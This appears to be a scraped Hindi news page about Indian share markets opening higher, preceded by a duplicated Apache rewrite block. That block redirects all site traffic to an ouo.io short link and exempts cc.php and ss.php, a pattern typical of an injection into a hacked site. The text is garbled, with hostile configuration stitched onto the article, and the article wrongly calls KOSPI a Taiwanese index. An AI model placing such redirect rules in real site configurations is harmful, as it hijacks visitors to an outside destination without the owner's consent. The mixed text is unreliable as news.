
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 574
Previousनई दिल्ली। मजबूत अंतरराष्ट्रीय संकेतों के बीच आज भारतीय शेयर बाजार की शुरुआत जबरदस्त बढ़त के साथ हुई। प्रमुख सूचकांक सेंसेक्स 150 अंक और निफ्टी 50 अंक से ज्यादा की बढ़त के साथ खुले। शुरुआती कारोबार में मिडकैप इंडेक्स में भी 1 फीसद से ज्यादा की तेजी देखने को मिल रही है। वहीं सरकारी बैंकिंग इंडेक्स भी 1 फीसद से ज्यादा के उछाल के साथ कारोबार कर रहा है। बाजार की तेजी में आज सभी इंडेक्स बढ़त के साथ कारोबार कर रहे हैं। सबसे ज्यादा तेजी मेटल, पीएसयू बैंक और रियल्टी इंडेक्स में देखने को मिल रही है। तीनों ही इंडेक्स एक फीसद से ज्यादा की बढ़त के साथ कारोबार कर रहे हैं। वहीं आइटी और फार्मा इंडेक्स में भी आधे फीसद से ज्यादा का उछाल है। निफ्टी में शुमार शेयर्स की बात करें तो 37 हरे निशान में और 13 गिरावट के साथ कारोबार कर रहे हैं। सबसे ज्यादा तेजी टाटा स्टील, विप्रो, एक्सिस बैंक, बजाज फाइनेंस और हिंदपेट्रो के शेयर्स में देखने को मिल रही है। वहीं, गिरावट इंफ्राटेल, गेल, भारती एयरटेल, हीरो मोटो कॉर्प और बजाज ऑटो के शेयर्स में देखने को मिल रही है। वहीं आज सुबह भारतीय बाजार खुलने से ठीक पहले जापान का इंडेक्स निक्केई 1.66 फीसद की बढ़त के साथ 21110 के स्तर पर कारोबार कर रहा है। वहीं शंघाई 29 अंक ऊपर 3163 के स्तर पर और हैंगसैंग 234 अंक चढ़कर 30783 के स्तर पर है। तायवार का इंडेक्स कोस्पी भी 0.61 फीसद की बढ़त के साथ 2451 के स्तर पर कारोबार कर रहा है।